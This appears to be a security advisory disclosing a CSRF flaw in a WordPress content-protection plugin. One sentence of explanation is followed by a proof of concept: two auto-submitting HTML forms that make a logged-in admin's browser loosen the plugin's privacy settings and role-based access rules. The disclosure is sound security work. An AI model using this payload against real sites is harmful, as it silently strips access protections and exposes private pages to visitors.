The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and disable the applied protection.
<form id="test" action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-options" method="POST">
<input type="text" name="capa_protect_show_private_pages" value="on">
<input type="text" name="capa_protect_show_private_categories" value="on">
<input type="text" name="capa_protect_post_policy" value="show message">
<input type="text" name="capa_protect_comment_policy" value="all">
<input type="text" name="capa_protect_show_only_allowed_attachments" value="on">
<input type="text" name="submit" value="Update general settings">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script>
<form id="test" action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-roles-page" method="POST">
<input type="text" name="empty" value="0">
<input type="text" name="capa_protect_cat[visitor][]" value="1">
<input type="text" name="empty" value="0">
<input type="text" name="capa_protect_pag[visitor][]" value="2">
<input type="text" name="empty" value="0">
<input type="text" name="capa_protect_pag[visitor][]" value="132">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="submit" value="Update Role Options">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script>